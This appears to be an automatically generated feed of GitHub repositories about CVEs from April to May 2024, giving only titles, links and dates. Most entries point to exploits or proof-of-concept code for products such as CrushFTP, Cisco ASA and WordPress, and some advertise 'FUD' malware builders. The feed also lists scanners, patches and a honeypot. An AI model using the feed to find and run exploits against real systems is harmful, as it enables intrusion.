**no description** : [InTheDarkness2102/CVE-2017-0143-MS-17-010-EternalBlue](https://github.com/InTheDarkness2102/CVE-2017-0143-MS-17-010-EternalBlue) create time: 2024-05-09T06:03:36Z

**no description** : [shaily29-eng/CyberSecurity_CVE-2021-45046](https://github.com/shaily29-eng/CyberSecurity_CVE-2021-45046) create time: 2024-05-09T03:04:17Z

**CVE-2024-26026: BIG-IP Next Central Manager API UNAUTHENTICATED SQL INJECTION** : [passwa11/CVE-2024-26026](https://github.com/passwa11/CVE-2024-26026) create time: 2024-05-09T03:14:14Z

**no description** : [FeatherStark/CVE-2024-21793](https://github.com/FeatherStark/CVE-2024-21793) create time: 2024-05-09T02:31:13Z

**CVE-2024-26517** : [unrealjbr/CVE-2024-26517](https://github.com/unrealjbr/CVE-2024-26517) create time: 2024-05-08T20:32:46Z

**A C++ version of the Frida Intercept Pythong script used for CVE-2020-0665.** : [otterpwn/SIDplusplus](https://github.com/otterpwn/SIDplusplus) create time: 2024-05-08T18:20:32Z

**no description** : [momo1239/cve-2024-xxxx](https://github.com/momo1239/cve-2024-xxxx) create time: 2024-05-08T17:52:48Z

**Exploit for Ivanti Automation Manager CVE-2022-44569** : [rweijnen/ivanti-automationmanager-exploit](https://github.com/rweijnen/ivanti-automationmanager-exploit) create time: 2024-05-08T13:00:16Z

**This repository shows u some information on this vulnerability, which were found by me.** : [c4cnm/CVE-2024-3867](https://github.com/c4cnm/CVE-2024-3867) create time: 2024-05-08T06:19:05Z

**no description** : [jrbH4CK/CVE-2022-22963](https://github.com/jrbH4CK/CVE-2022-22963) create time: 2024-05-08T04:25:29Z

**no description** : [mil4ne/CVE-2024-23897-Jenkins-4.441](https://github.com/mil4ne/CVE-2024-23897-Jenkins-4.441) create time: 2024-05-08T02:28:46Z

**Aprenda a Ganhar Dinheiro com Compra e Venda de Carros mesmo Sem Dinheiro para investir** : [cvendedorpro2024/cvendedorpro2024](https://github.com/cvendedorpro2024/cvendedorpro2024) create time: 2024-05-07T19:41:38Z

**(CVE-2023-31290) Trust Wallet Core before 3.1.1, as used in the Trust Wallet browser extension before 0.0.183, allows theft of funds because the entropy is 32 bits, as exploited in the wild in December 2022 and March 2023.** : [sk1ppi/py_trustwallet_wasm](https://github.com/sk1ppi/py_trustwallet_wasm) create time: 2024-05-07T15:02:22Z

**[CVE-2024-23897] Jenkins CI Authenticated Arbitrary File Read Through the CLI Leads to Remote Code Execution (RCE)** : [murataydemir/CVE-2024-23897](https://github.com/murataydemir/CVE-2024-23897) create time: 2024-05-07T11:00:03Z

**PoC for Exploiting CVE-2024-31848/49/50/51 - File Path Traversal** : [Stuub/CVE-2024-31848-PoC](https://github.com/Stuub/CVE-2024-31848-PoC) create time: 2024-05-07T10:42:03Z

**Critical use-after-free vulnerability discovered in Tinyproxy** : [d0rb/CVE-2023-49606](https://github.com/d0rb/CVE-2023-49606) create time: 2024-05-07T10:03:01Z

**CVE-2024-27956** : [k3ppf0r/CVE-2024-27956](https://github.com/k3ppf0r/CVE-2024-27956) create time: 2024-05-07T10:07:00Z

**CVE-2024-34469** : [Toxich4/CVE-2024-34469](https://github.com/Toxich4/CVE-2024-34469) create time: 2024-05-07T07:47:20Z

**no description** : [winrar-7/CVE-2018-20250-WinRAR-ACE](https://github.com/winrar-7/CVE-2018-20250-WinRAR-ACE) create time: 2024-05-06T21:01:30Z

**To find XSS injection** : [ashangp923/CVE-2018-10097](https://github.com/ashangp923/CVE-2018-10097) create time: 2024-05-06T14:28:49Z

**Fix open source package uses tough-cookie 2.5.0 - CVE-2023-26136,** : [ronmadar/Open-Source-Seal-Security](https://github.com/ronmadar/Open-Source-Seal-Security) create time: 2024-05-06T17:32:10Z

**no description** : [chucrutis/CVE-2024-32371](https://github.com/chucrutis/CVE-2024-32371) create time: 2024-05-06T17:41:06Z

**no description** : [chucrutis/CVE-2024-32370](https://github.com/chucrutis/CVE-2024-32370) create time: 2024-05-06T17:28:57Z

**no description** : [chucrutis/CVE-2024-32369](https://github.com/chucrutis/CVE-2024-32369) create time: 2024-05-06T17:22:15Z

**LINKSYS AC1900 EA7500v3 IGD UPnP Stack Buffer Overflow Remote Code Execution Vulnerability** : [dest-3/CVE-2023-46012](https://github.com/dest-3/CVE-2023-46012) create time: 2024-05-06T16:35:19Z

**no description** : [chucrutis/CVE-2024-32369](https://github.com/chucrutis/CVE-2024-32369) create time: 2024-05-06T17:06:58Z

**no description** : [GalloLuigi/Analisi-CVE-2017-5715](https://github.com/GalloLuigi/Analisi-CVE-2017-5715) create time: 2024-05-06T16:15:40Z

**no description** : [truonghuuphuc/CVE-2024-32709-Poc](https://github.com/truonghuuphuc/CVE-2024-32709-Poc) create time: 2024-05-05T17:21:55Z

**SOPlanning 1.52.00 CSRF/SQLi/XSS (CVE-2024-33722, CVE-2024-33724)** : [fuzzlove/soplanning-1.52-exploits](https://github.com/fuzzlove/soplanning-1.52-exploits) create time: 2024-04-22T19:51:18Z

**no description** : [lnversed/CVE-2024-1655](https://github.com/lnversed/CVE-2024-1655) create time: 2024-05-06T10:56:47Z

**Exploit for CVE-2023-42860** : [Trigii/CVE-2023-42860](https://github.com/Trigii/CVE-2023-42860) create time: 2024-04-09T14:53:46Z

**The provided exploit code leverages a stored Cross-Site Scripting (XSS) vulnerability (CVE-2024-4439) in WordPress Core versions up to 6.5.1.** : [d0rb/CVE-2024-4439](https://github.com/d0rb/CVE-2024-4439) create time: 2024-05-06T09:07:36Z

**CVE-2024-4439 PoC** : [MielPopsssssss/CVE-2024-4439](https://github.com/MielPopsssssss/CVE-2024-4439) create time: 2024-05-06T08:50:23Z

**no description** : [ThanHuuTuan/CVE_2024](https://github.com/ThanHuuTuan/CVE_2024) create time: 2022-06-29T02:01:14Z

**no description** : [FoxyProxys/CVE-2024-27956](https://github.com/FoxyProxys/CVE-2024-27956) create time: 2024-05-05T19:50:54Z

**no description** : [mil4ne/CVE-2023-23752-Joomla-v4.2.8](https://github.com/mil4ne/CVE-2023-23752-Joomla-v4.2.8) create time: 2024-05-05T16:16:03Z

**Fix open source package uses tough-cookie 2.5.0 to process their clients' cookies. Unfortunately, it is affected by CVE-2023-26136.** : [ronmadar/Open-Source-Package-Seal-Security](https://github.com/ronmadar/Open-Source-Package-Seal-Security) create time: 2024-05-05T14:27:29Z

**no description** : [c0d3cr4f73r/CVE-2021-44228](https://github.com/c0d3cr4f73r/CVE-2021-44228) create time: 2024-05-05T11:50:44Z

**no description** : [xbz0n/CVE-2024-33911](https://github.com/xbz0n/CVE-2024-33911) create time: 2024-05-05T11:14:47Z

**no description** : [xbz0n/CVE-2024-32136](https://github.com/xbz0n/CVE-2024-32136) create time: 2024-05-05T10:49:08Z

**Clario through 2024-04-11 for Windows Desktop has weak permissions for %PROGRAMDATA%\Clario and tries to load DLLs from there as SYSTEM.** : [Alaatk/CVE-2024-34474](https://github.com/Alaatk/CVE-2024-34474) create time: 2024-05-05T05:28:15Z

**no description** : [RHYru9/CVE-2024-25600-mass](https://github.com/RHYru9/CVE-2024-25600-mass) create time: 2024-05-05T02:18:00Z

**no description** : [OracleNep/CVE-2019-9670-DtdFilegeneration](https://github.com/OracleNep/CVE-2019-9670-DtdFilegeneration) create time: 2024-05-05T01:09:02Z

**no description** : [osvaldotenorio/CVE-2024-34471](https://github.com/osvaldotenorio/CVE-2024-34471) create time: 2024-05-05T01:10:39Z

**no description** : [osvaldotenorio/CVE-2024-34472](https://github.com/osvaldotenorio/CVE-2024-34472) create time: 2024-05-05T00:54:56Z

**no description** : [osvaldotenorio/CVE-2024-34470](https://github.com/osvaldotenorio/CVE-2024-34470) create time: 2024-05-05T00:31:31Z

**no description** : [c0d3cr4f73r/CVE-2023-1326](https://github.com/c0d3cr4f73r/CVE-2023-1326) create time: 2024-05-04T19:47:58Z

**Joomla! v4.2.8 - Unauthenticated information disclosure** : [c0d3cr4f73r/CVE-2023-23752](https://github.com/c0d3cr4f73r/CVE-2023-23752) create time: 2024-05-04T18:44:12Z

**CVE-2024-31851** : [GKalmus/referaat](https://github.com/GKalmus/referaat) create time: 2024-05-04T16:56:34Z

**no description** : [truonghuuphuc/CVE-2024-30491-Poc](https://github.com/truonghuuphuc/CVE-2024-30491-Poc) create time: 2024-05-04T14:22:15Z

**no description** : [Vignesh2712/utomation-for-Juniper-cve-2023-36845](https://github.com/Vignesh2712/utomation-for-Juniper-cve-2023-36845) create time: 2024-05-04T14:57:08Z

**no description** : [Vignesh2712/Automation-for-Juniper-cve-2023-36845](https://github.com/Vignesh2712/Automation-for-Juniper-cve-2023-36845) create time: 2024-05-04T14:51:45Z

**Fix open source package tough-cookie V 2.5.0 - CVE-2023-26136 rated as a critical vulnerability** : [ronmadar/Open-Source-Package](https://github.com/ronmadar/Open-Source-Package) create time: 2024-05-04T14:42:46Z

**Exploit for Cisco ASA and FTD (may 2024)** : [Garvard-Agency/CVE-2024-20359-CiscoASA-FTD-exploit](https://github.com/Garvard-Agency/CVE-2024-20359-CiscoASA-FTD-exploit) create time: 2024-05-04T10:40:22Z

**Critical RCE Vulnerabilities in HPE Aruba Devices (may 2024)** : [Roud-Roud-Agency/CVE-2024-26304-RCE-exploits](https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits) create time: 2024-05-04T10:09:24Z

**A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.** : [gotr00t0day/CVE-2024-4040](https://github.com/gotr00t0day/CVE-2024-4040) create time: 2024-05-03T23:29:53Z

**CVE-2024-27956 WORDPRESS RCE PLUGIN** : [X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN](https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN) create time: 2024-05-03T16:19:19Z

**CVE-2024-21413 Microsoft Outlook RCE Exploit** : [X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit](https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit) create time: 2024-05-03T16:09:54Z

**no description** : [truonghuuphuc/CVE-2024-27971-Note](https://github.com/truonghuuphuc/CVE-2024-27971-Note) create time: 2024-05-03T13:38:33Z

**Exploit for Cisco ASA and FTD (may 2024)** : [Spl0stus/CVE-2024-20353-CiscoASAandFTD](https://github.com/Spl0stus/CVE-2024-20353-CiscoASAandFTD) create time: 2024-05-03T12:46:09Z

**Exploit for Microsoft SmartScreen malicious execution (april 2024)** : [Sploitus/CVE-2024-29988-exploit](https://github.com/Sploitus/CVE-2024-29988-exploit) create time: 2024-05-03T12:17:25Z

**no description** : [saurabh2088/expat_2_1_0_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_0_CVE-2024-28757) create time: 2024-05-03T09:24:51Z

**no description** : [krnidhi/expat_2.1.1_CVE-2024-28757](https://github.com/krnidhi/expat_2.1.1_CVE-2024-28757) create time: 2024-05-03T04:58:24Z

**no description** : [saurabh2088/expat_2_1_0-_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_0-_CVE-2024-28757) create time: 2024-05-03T10:12:25Z

**no description** : [saurabh2088/expat_2_1_1_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_1_CVE-2024-28757) create time: 2024-05-03T10:11:38Z

**no description** : [RenukaSelvar/expat_CVE-2024-28757](https://github.com/RenukaSelvar/expat_CVE-2024-28757) create time: 2024-05-03T09:21:27Z

**no description** : [krnidhi/expat_2.1.1_CVE-2024-28757](https://github.com/krnidhi/expat_2.1.1_CVE-2024-28757) create time: 2024-05-03T08:47:56Z

**Jenkins CVE-2024-23897: Arbitrary File Read Vulnerability** : [Athulya666/CVE-2024-23897](https://github.com/Athulya666/CVE-2024-23897) create time: 2024-05-03T08:18:51Z

**Bypass for CVE-2007-4559 Trellix patch** : [luigigubello/trellix-tarslip-patch-bypass](https://github.com/luigigubello/trellix-tarslip-patch-bypass) create time: 2024-05-03T00:09:55Z

**writeup and PoC for CVE-2024-32766 (QNAP) OS command injection and auth bypass** : [3W1nd4r/CVE-2024-32766-RCE](https://github.com/3W1nd4r/CVE-2024-32766-RCE) create time: 2024-05-02T23:39:18Z

**no description** : [xsxtw/CVE-2019-0232](https://github.com/xsxtw/CVE-2019-0232) create time: 2024-05-02T22:57:58Z

**kernal exploit 3156** : [34rthq04k3/CVE-2021-3156](https://github.com/34rthq04k3/CVE-2021-3156) create time: 2024-05-02T22:19:00Z

**Kernal Exploit** : [34rthq04k3/CVE-2021-22600](https://github.com/34rthq04k3/CVE-2021-22600) create time: 2024-05-02T22:16:44Z

**no description** : [xsxtw/CVE-2022-26134](https://github.com/xsxtw/CVE-2022-26134) create time: 2024-05-02T18:31:54Z

**This POC exploits a format validation vulnerability in the RTSP service of the Hipcam RealServer/V1.0, inducing a crash for approximately 45 seconds by injecting random data into the 'client_port' parameter during the RTSP SETUP request. Hipcam RealServer/V1.0 is used in many Hipcam Cameras. | CVE-2023-50685** : [UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability](https://github.com/UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability) create time: 2023-12-10T13:21:43Z

**About CVE-2021-36593 and CVE-2021-36594** : [mir-hossein/Statement](https://github.com/mir-hossein/Statement) create time: 2024-05-02T06:41:14Z

**no description** : [s1204IT/CVE-2023-6241](https://github.com/s1204IT/CVE-2023-6241) create time: 2024-05-02T02:17:31Z

**no description** : [xcr-19/CVE-2023-32749](https://github.com/xcr-19/CVE-2023-32749) create time: 2024-05-01T21:37:00Z

**no description** : [Neo-XeD/CVE-2024-33775](https://github.com/Neo-XeD/CVE-2024-33775) create time: 2024-05-01T15:46:32Z

**no description** : [HBLocker/CVE-2024-33078](https://github.com/HBLocker/CVE-2024-33078) create time: 2024-05-01T15:45:45Z

**no description** : [jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability](https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability) create time: 2024-05-01T14:42:39Z

**no description** : [tronghoang89/cve-2019-16113](https://github.com/tronghoang89/cve-2019-16113) create time: 2024-05-01T10:03:17Z

**no description** : [xsxtw/CVE-2022-0847](https://github.com/xsxtw/CVE-2022-0847) create time: 2024-05-01T05:16:16Z

**no description** : [xsxtw/SpringFramework_CVE-2022-22965_RCE](https://github.com/xsxtw/SpringFramework_CVE-2022-22965_RCE) create time: 2024-05-01T02:36:13Z

**no description** : [momika233/CVE-2024-21006](https://github.com/momika233/CVE-2024-21006) create time: 2024-05-01T03:08:48Z

**PoC for wordpress takeover in CVE-2024-27956** : [diego-tella/CVE-2024-27956-RCE](https://github.com/diego-tella/CVE-2024-27956-RCE) create time: 2024-05-01T01:58:28Z

**writeup and PoC for CVE-2024-32766 (QNAP) OS command injection, chained attack for auth bypass.** : [p3c34r7/CVE-2024-32766-POC](https://github.com/p3c34r7/CVE-2024-32766-POC) create time: 2024-04-30T21:30:19Z

**Update of https://github.com/1337g/CVE-2017-12149 to work with python3** : [JesseClarkND/CVE-2017-12149](https://github.com/JesseClarkND/CVE-2017-12149) create time: 2024-04-30T18:40:48Z

**no description** : [CCIEVoice2009/CVE-2024-1086](https://github.com/CCIEVoice2009/CVE-2024-1086) create time: 2024-04-30T16:10:37Z

**Exploit CrushFTP CVE-2024-4040** : [Mohammaddvd/CVE-2024-4040](https://github.com/Mohammaddvd/CVE-2024-4040) create time: 2024-04-30T13:27:34Z

**writeup and PoC for CVE-2024-32766 QNAP OS command injection vulnerability.** : [hulNtor/CVE-2024-32766-POC](https://github.com/hulNtor/CVE-2024-32766-POC) create time: 2024-04-30T01:57:31Z

**A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.** : [gotr00t0day/CVE-2022-1388](https://github.com/gotr00t0day/CVE-2022-1388) create time: 2024-04-30T01:10:05Z

**no description** : [Lavender-exe/CVE-2024-29296-PoC](https://github.com/Lavender-exe/CVE-2024-29296-PoC) create time: 2024-04-29T19:09:41Z

**Exploit for CVE-2024-4040 affecting CrushFTP server in all versions before 10.7.1 and 11.1.0 on all platforms** : [Praison001/CVE-2024-4040-CrushFTP-server](https://github.com/Praison001/CVE-2024-4040-CrushFTP-server) create time: 2024-04-29T10:21:53Z

**no description** : [AbrarKhan/Linux-4.19.72_CVE-2020-24490](https://github.com/AbrarKhan/Linux-4.19.72_CVE-2020-24490) create time: 2024-04-29T09:39:42Z

**no description** : [AbrarKhan/linux_CVE-2020-24490-beforePatch](https://github.com/AbrarKhan/linux_CVE-2020-24490-beforePatch) create time: 2024-04-29T06:47:40Z

**how does it run?** : [cdxiaodong/CVE-2024-3154-communication](https://github.com/cdxiaodong/CVE-2024-3154-communication) create time: 2024-04-29T04:03:11Z

**no description** : [FoxyProxys/CVE-2024-21345](https://github.com/FoxyProxys/CVE-2024-21345) create time: 2024-04-28T21:36:33Z

**A simple bash script to exploit Joomla! < 4.2.8 - Unauthenticated information disclosure** : [0xx01/CVE-2023-23752](https://github.com/0xx01/CVE-2023-23752) create time: 2024-04-28T16:32:21Z

**This is POC for CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload)** : [Puvipavan/CVE-2024-2667-POC](https://github.com/Puvipavan/CVE-2024-2667-POC) create time: 2024-04-28T17:14:47Z

**exploit for CVE-2024-4040** : [0xN7y/CVE-2024-4040](https://github.com/0xN7y/CVE-2024-4040) create time: 2024-04-28T13:06:01Z

**no description** : [nahcusira/CVE-2021-26084](https://github.com/nahcusira/CVE-2021-26084) create time: 2024-04-28T08:56:30Z

**Tool for finding CVE-2021-42063** : [Cappricio-Securities/CVE-2021-42063](https://github.com/Cappricio-Securities/CVE-2021-42063) create time: 2024-04-28T06:09:14Z

**CVE-2023-20198-RCE, support adding/deleting users and executing cli commands/system commands.** : [Codeb3af/CVE-2023-20198-RCE](https://github.com/Codeb3af/CVE-2023-20198-RCE) create time: 2024-04-28T01:25:41Z

**This repository is a proof of vulnerability for CVE-2024-33339** : [balckgu1/Poc](https://github.com/balckgu1/Poc) create time: 2024-04-28T01:56:40Z

**Exploit for GlobalProtect CVE-2024-3400** : [marconesler/CVE-2024-3400](https://github.com/marconesler/CVE-2024-3400) create time: 2024-04-27T18:58:41Z

**no description** : [keaidmmc/CVE-2024-33386](https://github.com/keaidmmc/CVE-2024-33386) create time: 2024-04-27T18:15:28Z

**This repository contains a proof of concept about the exploitation of the aiohttp library for the reported vulnerability CVE-2024-23334.** : [brian-edgar-re/poc-cve-2024-23334](https://github.com/brian-edgar-re/poc-cve-2024-23334) create time: 2024-04-27T13:21:50Z

**no description** : [SaintMichae64/CVE-2023-2255](https://github.com/SaintMichae64/CVE-2023-2255) create time: 2024-04-27T11:21:11Z

**no description** : [truonghuuphuc/CVE-2024-27956](https://github.com/truonghuuphuc/CVE-2024-27956) create time: 2024-04-27T11:03:36Z

**no description** : [Gloway17/ActiveMQ-CVE-2023-46604](https://github.com/Gloway17/ActiveMQ-CVE-2023-46604) create time: 2024-04-27T06:04:02Z

**The sqlmap payload to exploit CVE-2023-40933** : [sealldeveloper/CVE-2023-40933-PoC](https://github.com/sealldeveloper/CVE-2023-40933-PoC) create time: 2024-04-27T01:44:44Z

**The sqlmap payload to exploit CVE-2023-40931** : [sealldeveloper/CVE-2023-40931-PoC](https://github.com/sealldeveloper/CVE-2023-40931-PoC) create time: 2024-04-27T01:42:23Z

**Explore CVE-2022-41741 with the Evil MP4 repository. It offers educational PoCs, mitigation strategies, and detailed documentation on securing nginx against MP4 file vulnerabilities. For legal, ethical security testing only.** : [dumbbutt0/evilMP4](https://github.com/dumbbutt0/evilMP4) create time: 2024-04-26T17:18:52Z

**NSE script for checking the presence of CVE-2023-22515** : [fyx1t/NSE--CVE-2023-22515](https://github.com/fyx1t/NSE--CVE-2023-22515) create time: 2024-04-26T17:57:33Z

**Proof-of-Concept for CVE-2024-26218** : [exploits-forsale/CVE-2024-26218](https://github.com/exploits-forsale/CVE-2024-26218) create time: 2024-04-26T16:41:04Z

**Proof-of-Concept for CVE-2024-21345** : [exploits-forsale/CVE-2024-21345](https://github.com/exploits-forsale/CVE-2024-21345) create time: 2024-04-26T16:38:17Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [CarsPound/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/CarsPound/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-26T13:12:41Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [CarsPound/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/CarsPound/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-26T13:12:41Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [CarsPound/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/CarsPound/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-26T13:12:41Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [CarsPound/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/CarsPound/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-04-26T13:12:41Z

**activemq-rce-cve-2023-46604** : [thinkycx/activemq-rce-cve-2023-46604](https://github.com/thinkycx/activemq-rce-cve-2023-46604) create time: 2024-04-26T11:42:57Z

**no description** : [libertycityhacker/CVE-2023-43364-Exploit-CVE](https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE) create time: 2024-04-26T03:09:09Z

**no description** : [nullbyter19/CVE-2018-25031](https://github.com/nullbyter19/CVE-2018-25031) create time: 2024-04-26T02:18:36Z

**no description** : [LamSonBinh/CVE-2018-20250](https://github.com/LamSonBinh/CVE-2018-20250) create time: 2024-04-26T01:18:45Z

**CVE-2024-4040 CrushFTP SSTI LFI & Auth Bypass | Full Server Takeover** : [Stuub/Crushed-CVE-2024-4040-PoC](https://github.com/Stuub/Crushed-CVE-2024-4040-PoC) create time: 2024-04-25T19:51:38Z

**Nginx (ver. 0.5.6 - 1.13.2) Remote Integer Overflow** : [SirEagIe/CVE-2017-7529](https://github.com/SirEagIe/CVE-2017-7529) create time: 2024-04-25T13:56:31Z

**no description** : [samigt/CVE-2022-25883-semver-poc](https://github.com/samigt/CVE-2022-25883-semver-poc) create time: 2024-04-25T13:27:15Z

**no description** : [minhbao15677/CVE-2023-50164](https://github.com/minhbao15677/CVE-2023-50164) create time: 2022-12-22T07:49:13Z

**Nginx (ver. 0.5.6 - 1.13.2) Remote Integer Overflow** : [SirEagIe/CVE-2019-7529](https://github.com/SirEagIe/CVE-2019-7529) create time: 2024-04-25T12:37:34Z

**no description** : [0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection](https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection) create time: 2024-04-25T10:23:03Z

**POC for SQLi vulnerability in Icegram express** : [c0d3zilla/CVE-2024-2876](https://github.com/c0d3zilla/CVE-2024-2876) create time: 2024-04-25T09:53:22Z

**CVE-2023-20198-RCE, support adding/deleting users and executing cli commands/system commands.** : [W01fh4cker/CVE-2023-20198-RCE](https://github.com/W01fh4cker/CVE-2023-20198-RCE) create time: 2024-04-25T06:59:53Z

**Blind SQLi exploit for CVE-2024-2876. a vulnerability effecting the Icegram express - Email subscribers plugin for wordpress.** : [c0d3zilla/CVE-2024-2876](https://github.com/c0d3zilla/CVE-2024-2876) create time: 2024-04-25T06:25:53Z

**A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.** : [Mufti22/CVE-2024-4040](https://github.com/Mufti22/CVE-2024-4040) create time: 2024-04-25T05:18:06Z

**no description** : [rbih-boulanouar/CVE-2024-4040](https://github.com/rbih-boulanouar/CVE-2024-4040) create time: 2024-04-25T04:45:38Z

**Scanner of vulnerability on crushftp instance** : [tucommenceapousser/CVE-2024-4040-Scanner](https://github.com/tucommenceapousser/CVE-2024-4040-Scanner) create time: 2024-04-25T04:01:23Z

**no description** : [topyagyuu/CVE-2021-43798](https://github.com/topyagyuu/CVE-2021-43798) create time: 2024-04-24T20:47:29Z

**JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)** : [Zyad-Elsayed/CVE-2023-42793](https://github.com/Zyad-Elsayed/CVE-2023-42793) create time: 2024-04-24T16:33:20Z

**CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload that leads to remote code execution (RCE).** : [julio-cfa/CVE-2024-33438](https://github.com/julio-cfa/CVE-2024-33438) create time: 2024-04-24T16:31:17Z

**POC VIDEO - https://youtu.be/hNzmkJj-ImM?si=NF0yoSL578rNy7wN** : [Athos-Zago/CVE-2024-30973](https://github.com/Athos-Zago/CVE-2024-30973) create time: 2024-04-24T16:10:22Z

**Check to see if your Palo Alto firewall has been compromised by running script againt support bundle.** : [terminalJunki3/CVE-2024-3400-Checker](https://github.com/terminalJunki3/CVE-2024-3400-Checker) create time: 2024-04-24T14:30:34Z

**Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability** : [zam89/CVE-2024-3400-pot](https://github.com/zam89/CVE-2024-3400-pot) create time: 2024-04-24T14:21:26Z

**Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection)** : [Cappricio-Securities/CVE-2018-8033](https://github.com/Cappricio-Securities/CVE-2018-8033) create time: 2024-04-24T12:23:21Z

**CVE-2019-9670 is used to find XXE bug** : [Cappricio-Securities/CVE-2019-9670](https://github.com/Cappricio-Securities/CVE-2019-9670) create time: 2024-04-24T12:32:18Z

**Scan for python installations on macOS, and run CVE-2015-20107.py script to report if patching is needed** : [codeskipper/Snake-Patrol](https://github.com/codeskipper/Snake-Patrol) create time: 2024-04-24T09:31:03Z

**Quick mitigation script** : [mattaperkins/FIX-CVE-2024-2961](https://github.com/mattaperkins/FIX-CVE-2024-2961) create time: 2024-04-24T07:32:08Z

**PoC exploit for GLPI - Command injection using a third-party library script** : [allendemoura/CVE-2022-35914](https://github.com/allendemoura/CVE-2022-35914) create time: 2024-04-24T06:39:10Z

**In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers. Cre: NVD** : [buiduchoang24/CVE-2023-34040](https://github.com/buiduchoang24/CVE-2023-34040) create time: 2024-04-24T03:54:16Z

**CVE-2024-4040 (CrushFTP VFS escape) or (CrushFTP unauthenticated RCE)** : [tr4c3rs/CVE-2024-4040-RCE-POC](https://github.com/tr4c3rs/CVE-2024-4040-RCE-POC) create time: 2024-04-23T23:16:36Z

**PoC for the Untrusted Pointer Dereference in the appid.sys driver** : [varwara/CVE-2024-21338](https://github.com/varwara/CVE-2024-21338) create time: 2024-04-23T19:09:22Z

**Resources and PoCs** : [maen08/CVE-2024-25277](https://github.com/maen08/CVE-2024-25277) create time: 2024-02-25T16:54:33Z

**AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload** : [imhunterand/CVE-2023-51409](https://github.com/imhunterand/CVE-2023-51409) create time: 2024-04-23T09:25:37Z

**Scanner for CVE-2024-4040** : [airbus-cert/CVE-2024-4040](https://github.com/airbus-cert/CVE-2024-4040) create time: 2024-04-23T09:31:29Z

**no description** : [mrrobot0o/CVE-2024-3273-](https://github.com/mrrobot0o/CVE-2024-3273-) create time: 2024-04-23T06:31:19Z

**A basic script that exploits CVE-2011-2523** : [Tenor-Z/SmileySploit](https://github.com/Tenor-Z/SmileySploit) create time: 2024-04-23T05:33:39Z

**CVE-2023-0386 包含所需运行库** : [EstamelGG/CVE-2023-0386-libs](https://github.com/EstamelGG/CVE-2023-0386-libs) create time: 2024-04-22T23:33:35Z

**Exploit Tool to CrushFTP** : [qt2a23/CVE-2024-4040](https://github.com/qt2a23/CVE-2024-4040) create time: 2024-04-22T23:30:28Z

**no description** : [K3ysTr0K3R/CVE-2018-14847-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-14847-EXPLOIT) create time: 2024-04-22T22:33:25Z

**CVE-2024-27199 PoC - RCE, Admin Account Creation, Enum Users, Server Information** : [Stuub/RCity-CVE-2024-27199](https://github.com/Stuub/RCity-CVE-2024-27199) create time: 2024-04-22T22:14:24Z

**no description** : [NN0b0dy/CVE-2024-32399](https://github.com/NN0b0dy/CVE-2024-32399) create time: 2024-04-22T15:15:37Z

**no description** : [ViktorNaum/CVE-2024-31497-POC](https://github.com/ViktorNaum/CVE-2024-31497-POC) create time: 2024-04-22T12:58:13Z

**A final project for "Network Security" class at NYCU (National Yang Ming Chiao Tung University, Taiwan). Exploiting a CVE in "EasyAppointments" software.** : [mija-pilkaite/CVE-2022-0482_exploit](https://github.com/mija-pilkaite/CVE-2022-0482_exploit) create time: 2024-04-22T11:10:33Z

**no description** : [buiduchoang24/CVE-2023-33733](https://github.com/buiduchoang24/CVE-2023-33733) create time: 2024-04-22T09:32:54Z

**no description** : [TYuan0816/cve-2023-44487](https://github.com/TYuan0816/cve-2023-44487) create time: 2024-04-22T08:56:39Z

